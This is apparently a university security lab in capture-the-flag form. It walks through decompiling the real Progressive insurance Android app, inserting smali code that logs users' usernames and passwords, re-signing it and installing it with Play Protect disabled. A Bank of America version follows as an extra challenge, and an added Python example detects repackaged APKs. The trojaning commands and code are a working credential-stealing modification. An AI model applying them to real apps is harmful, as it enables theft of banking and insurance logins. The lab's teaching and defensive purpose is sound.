M 401: Trojaning Progressive and Bank of America Apps (20 pts + 20 extra)

What You Need for This Project

Purpose

To practice unpacking an unprotected app, modifying it, and creating a modified app. This should not be easy to do, but it is, because many companies don't bother to obfuscate their Dalvik code.

Responsible Disclosure

I notified Progressive about this in 2015 but they did not fix it.

Installing the Progressive App

In the App Store, install this app.

Progressive may change the app, which would make the steps below change somewhat, so you may prefer to use this archived copy of the version I used.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Pulling the APK from the Phone

To see the complete package name, on Kali, execute this command:
adb shell pm list packages | grep prog
The reply shows the package name, as shown below. Use that package name in the next command to get the APK path:
adb shell pm path com.phonevalley.progressive
The reply shows the full path to the APK. Use that path in the next command to pull the APK file:
adb pull /data/app/com.phonevalley.progressive-yHPkfG7TWMsbngAN-RW68g==/base.apk
The file downloads into Kali, as shown below.

Disassembling the APK with apktool

On Kali, in a Terminal, execute this command:
apktool d -f -r base.apk
Apktool disassembles the app, as shown below.

Exploring the Smali Code

After decoding, the Dalvik bytecode appears in a folder named "base", in many subfolders, as shown below.

It might seem difficult to hunt through all those files and folders for important items, but it's easy to do because the code is not obfuscated, and contains easily-guessed object names.

Finding Interesting Code with Grep

Start in the directory containing your APK file, such as Downloads.

Execute this command:

grep -ir login . | grep password
This finds lines containing both "login" and "password", as shown below.

The lines are wide and wrap in a way that makes them difficult to read, so use "less" to clean them up:

grep -ir login . | grep password | less -S
Now it's easy to see that only a few files have interesting content. We'll edit the file highlighted in the image below.

Press Q to exit "less".

Viewing Smali Code

Execute this command:
nano ./base/smali_classes2/com/phonevalley/progressive/login/viewmodel/LoginViewModel.smali
The Smali file opens in nano. Type Ctrl+W to start a search. Type in this search string, as shown below.
loginOnlineAccount(

Press Enter. Type Ctrl+W again. Press Enter again.

You see the start of the ".method private loginOnlineAccount(" function, as shown below.

Inserting Trojan Code

We'll add code that puts the username and password into the log.

Notice the line highlighted in the image above that says:

.locals 5
That line reserves five local registers (v0 through v4) for use in this method. The code inserted below uses a sixth register, v5, so change that line to:
.locals 6
as shown below.

Scroll down a little, and look at the code below the ".line 434" mark, as shown below.

On Jan 29, 2020 I repeated this project and the steps still work, but the line number is now 573.

This code puts the username into variable v2 and the password into variable v3. All we need to do is to put those variables into the log.

Carefully insert this code after the second "check-cast" statement, as shown below.

# TROJAN   
const-string v5, "TROJAN Stealing Progressive Credentials:"
invoke-static {v5, v2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v5, v3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# END OF TROJAN 

Press Ctrl+X, Y, Enter to save the modified file.

Rebuilding the App

To build a new APK file from the modified code in the "base" directory, execute this command:
apktool b base
Apktool builds the app, as shown below.

Making a Code Signing Certificate

Android won't run unsigned apps, so we need a signing certificate.

Execute this command:

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password". Enter the password "password" twice.

Then a series of questions asks for your name, etc. You can press Enter for each question except the last one, which you must answer "yes" to, as shown below.

Signing the New APK

Execute this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore base/dist/base.apk alias_name
When prompted, enter the keystore password, which is "password".

Installing Jarsigner

If you see the message
jarsigner: command not found
execute these commands to install it:
sudo apt update
sudo apt install -y default-jdk
If you get "Hash Sum mismatch" errors, try these solutions:
The app is signed, as shown below.

Uninstalling the Original App

On your Android device, open Settings and tap these items, as shown below.

Disabling Play Protect

On your Android device, open "Play Store" and tap these items, as shown below.

Installing the Modified App

On Kali, in the Terminal, execute this command:
adb install base/dist/base.apk
The installation succeeds, as shown below.

Monitoring the Log

On Kali, in the Terminal, execute this command:
adb logcat
A lot of messages scroll by.

To make the display cleaner, press Ctrl+C and execute this command:

adb logcat | grep TROJAN
Now the scrolling stops, waiting for log entries containing the string "TROJAN", as shown below.

Using the Trojaned App

On your Genymotion Android device, open the Progressive app.

Enter fake credentials, using your name as the login name, as shown below. Click "Log in".

Viewing the Stolen Data

Your Terminal window should show the stolen data, as shown below.
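The rebuilt APK differs from the vendor's build in two ways a defender can check offline without running the app: its classes*.dex entries were re-emitted by apktool from the edited smali, and its META-INF signature files were produced by a key that is not the vendor's. The Python below is an added example, not part of this lab, that compares two APKs and reports both differences; the two APKs here are constructed in-memory zips standing in for the pulled base.apk and the rebuilt base/dist/base.apk, and the ALIAS_NA.* names assume jarsigner's habit of naming signature files after the first eight characters of the alias.

```python
import hashlib
import io
import zipfile

# jarsigner-style v1 signature entries: META-INF/<ALIAS>.SF plus .RSA/.DSA/.EC
SIG_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")

def entry_digests(apk_bytes):
    """Map each zip entry name to the SHA-256 of its uncompressed content."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {n: hashlib.sha256(zf.read(n)).hexdigest() for n in zf.namelist()}

def signature_files(names):
    """Entry names that make up the JAR (v1) signature of an APK."""
    return {n for n in names if n.startswith("META-INF/") and n.upper().endswith(SIG_SUFFIXES)}

def compare_apks(original, suspect):
    """Report which Dalvik bytecode files changed and whether the signer did."""
    a, b = entry_digests(original), entry_digests(suspect)
    changed = {n for n in a.keys() & b.keys() if a[n] != b[n]}
    # apktool b re-emits classes.dex, classes2.dex, ... from the edited smali.
    code_changed = sorted(n for n in changed if n.lower().endswith(".dex"))
    # Re-signing without the vendor's key renames (jarsigner uses the alias) or replaces *.SF/*.RSA.
    sigs_a, sigs_b = signature_files(a), signature_files(b)
    signer_changed = sigs_a != sigs_b or any(n in changed for n in sigs_a)
    return {"code_changed": code_changed, "signer_changed": signer_changed,
            "added": sorted(b.keys() - a.keys()), "removed": sorted(a.keys() - b.keys())}

def build_apk(entries):
    """Constructed stand-in for an APK: a zip holding the given name -> bytes entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed sample data (not real app bytes): the vendor build, and a copy rebuilt with
# one extra Log.e call in the login class and re-signed under the alias "alias_name".
ORIGINAL = build_apk({
    "classes.dex": b"dex\n035\x00main-classes",
    "classes2.dex": b"dex\n035\x00LoginViewModel",
    "META-INF/CERT.SF": b"Signature-Version: 1.0\n",
    "META-INF/CERT.RSA": b"vendor-pkcs7-blob",
})
REPACKAGED = build_apk({
    "classes.dex": b"dex\n035\x00main-classes",
    "classes2.dex": b"dex\n035\x00LoginViewModel+Log.e",
    "META-INF/ALIAS_NA.SF": b"Signature-Version: 1.0\n",
    "META-INF/ALIAS_NA.RSA": b"self-signed-pkcs7-blob",
})
```

On real files, pass the bytes of the APK pulled from a known-good device and of the suspect package; a changed signer with untouched code still means the package is not the vendor's build.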

M 401.1: Log Entry (20 pts)

Find the text covered by a green box in the image above. That's the flag.

Capturing a Screen Image

Capture a WHOLE-DESKTOP image showing the flag.

Save the image as "Proj M 401.1 from YOUR NAME".

Trojaning a Bank of America App (20 extra)

Responsible Disclosure

I notified Bank of America about this in 2015 but they did not fix it.

Challenge

Install this app:


If you prefer, you can use my archived copy here:

base.apk

Add a Trojan to steal the username and password, as shown below.

Hints

M 401.2: Smali Code (20 pts)

Examine the function you Trojaned in a text editor.

Find the text covered by a green box in the image below. That's the flag.

Capturing a Screen Image

Capture a WHOLE-DESKTOP image showing the flag.

Save the image as "Proj M 401.2 from YOUR NAME".


Converted to a CTF 2-28-19
Updated Jan 1-29-2020
Bank of America added 2-2-2020